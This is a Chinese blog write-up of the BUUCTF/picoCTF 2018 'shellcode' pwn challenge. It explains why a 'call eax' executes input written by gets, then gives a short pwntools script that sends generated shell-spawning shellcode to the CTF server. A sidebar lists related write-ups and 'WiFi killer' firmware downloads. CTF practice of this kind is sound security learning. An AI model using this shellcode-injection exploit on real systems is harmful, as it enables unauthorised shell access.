[BUUCTF-pwn]——picoctf_2018_shellcode

最新推荐文章于 2024-04-10 04:54:39 发布
最新推荐文章于 2024-04-10 04:54:39 发布
阅读量350 收藏 1
点赞数
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/114015622
版权

[BUUCTF-pwn]——picoctf_2018_shellcode

论学好汇编的重要性。在这道题得到了体现。

第一次面向汇编, 说实话看的挺慢的。
话不多说
直接上
checksec看下
在这里插入图片描述
IDA中没法发反汇编,只能面向汇编编程。无法反汇编是call eax的问题,但是这个指令应该没有错,只能说这个时间eax存储着一个函数地址。也就是[ebp+var_A0]偏移处的函数。
在这里插入图片描述
我们可以发现这个偏移也是vuln函数的参数。在vuln函数内,我们发现gets函数写入的位置也是这里(ebp+8,32位就是参数的位置)。
在这里插入图片描述
所以也就是我们直接写入shellcode,当执行call eax时就会自动执行。
当然这个只有main函数不可以反汇编其他还是可以的,你们也可以结合参考一下

exploit

from pwn import *
p = remote("node3.buuoj.cn",27027)
shellcode = asm(shellcraft.sh())
p.sendlineafter('Enter a string!\n',shellcode)
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
攻防世界-wp-PWN-新手区-6-cgpwn2
Scorpio_m7
02-26 1495
目来源 CGCTF 目描述 菜鸡认为自己需要一个字符串 目场景 220.249.52.134:49499 目附件 53c24fc5522e4a8ea2d9ad0577196b2f 目思路: 目给了pwn的函数是利用系统调用打印"hehehe",存在一个call system在0x0804855A,由于hello函数中的gets函数获取的字符串s没有输入字符数量的限制,直接栈溢出,将返回地址覆盖为call system,由于name在bss段中,地址固定不变,程序中调用了system函数,但是没有
[BUUCTF]PWN——picoctf_2018_shellcode
mcmuyanga的博客
01-23 536
picoctf_2018_shellcode 附件 步骤 虽然目都叫shellcode了,肯定没有开什么保护,但还是例行检查,32位程序 本地试运行一下,看看大概的情况 32位ida打开,没法f5,只能看汇编了,汇编太长就不截图了,做做多了,直接看vlun,一般这个函数都有漏洞 看到vlun里调用了gets,参数是ebp+arg_0,结合main函数我们可以看到,gets 函数写入的地址即为 [ebp+var_A0] 对应的地址 然后在main函数里又发现,我们gets写入的地址,下
pwn入门-buu第二页解(32道)(持续更新中)(1),2024年最新2024最新网易网络安全面经
最新发布
2401_84181524的博客
04-10 482
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
2019 安恒周周练西湖论剑特别版 pwn 目wp
abc380620175的博客
03-28 538
pwn1 考点:构造 shellcode,patch 汇编指令 IDA 查看反汇编,程序的逻辑很简单如,如果 直接 f5 的话 IDA 可能识别不出来函数,问出在 0x080484CF 这个地方,call eax 指令识别不出来,所以这里可以先 patch 成 nop,之后 f5 就正常了。 程序把输入当成 shellcode 直接来执行,很显然是直接往栈上写 shellcode ...
[buuctf]PicoCTF_2018_shellcode
逆向萌新的博客
07-17 367
[buuctf]PicoCTF_2018_shellcode,这道主要是考你的shellcode编写能力和使用能力,或者是利用pwntools自动生成的shellcode进行利用
picoctf_2018_shellcode
z1r0的博客
12-29 985
picoctf_2018_shellcode 查看保护 主函数不可以直接反汇编,错在call eax这里,eax拿的是ebp+var_A0这里对应的地址。发现在call vuln上面也将eax给赋了ebp+var_A0这里的地址。进vuln看一下 可以看到vuln函数中call了gets,可以写入ebp+arg_0这里的地址。而ebp+arg_0对应是地址则是main函数中ebp+var_A0中的地址。最后会call这个地址。所以写入shellcode,最后程序会自动call这里的shellcode
BUUCTF4
m0_51251108的博客
10-30 295
目:hitcon2014_stkof:pwnable_hacknote:ciscn_2019_s_9:picoctf_2018_shellcode:npuctf_2020_easyheap:cmcc_pwnme2:x_ctf_b0verfl0w:picoctf_2018_leak_me:suctf_2018_basic pwn:cmcc_pwnme1: hitcon2014_stkof: 参考师傅:(4条消息) 好好说话之unlink_hollk’s blog-CSDN博客_好好说话之unlink 利用方
PicoCTF-2019-WirteUp
Zichel77的博客
11-25 1268
1. 2Warm-General Skills 直接将十进制转化为二进制 picoCTF{101010} 2. Insp3ct0r-Web Exploitation https://2019shell1.picoctf.com/problem/63975/ 点击链接看到如下页面 点击What没有变化,点击How出现如下页面 说明是分别从HTML,CS...
[BUUCTF-pwn]——picoctf_2018_can_you_gets_me
Y_peak的博客
02-24 347
[BUUCTF-pwn]——picoctf_2018_can_you_gets_me 目地址:https://buuoj.cn/challenges#picoctf_2018_can_you_gets_me 通过这道又学到了一个知识点。ROPgadget构造rop链 还是先checksec一下 在IDA中,查看一下。有gets栈溢出,又有puts函数。想当然的我们想到,通过puts函数,leek出一个got表地址,找到libc的栈基址,进而找到system函数和’/bin/sh’ 尝试过后你会
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn shellcode 变形shellcode练手目,该目主要是利用三个节点来注入shellcode,考验解人对shellcode的熟悉程度。解:https://blog.csdn.net/A951860555/article/details/110350773
PWM-OUT.rar_PWN_out
09-19
原子 的PWN 输出,寄存器程序,完全寄存器操作,可以直接打开。
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 3496
BUUCTF——warmup_csaw_2016 目地址:https://buuoj.cn/challenges 目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
[BUUCTF-pwn]——ciscn_2019_n_3
Y_peak的博客
11-20 3049
[BUUCTF-pwn]——ciscn_2019_n_3 结构体: //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道目就是简单的u
[BUUCTF-pwn]——ciscn_2019_n_8
Y_peak的博客
02-10 1760
[BUUCTF-pwn]——ciscn_2019_n_8 目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 目 上去checksec一下,吓一跳保护基本全开了。 在IDA中一看,开心了。如此简单 只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +
[BUUCTF-pwn]——jarvisoj_level0
Y_peak的博客
01-31 1583
[BUUCTF-pwn]——jarvisoj_level0 目地址:https://buuoj.cn/challenges#jarvisoj_level0 目: 还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。 64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数 发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。 再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值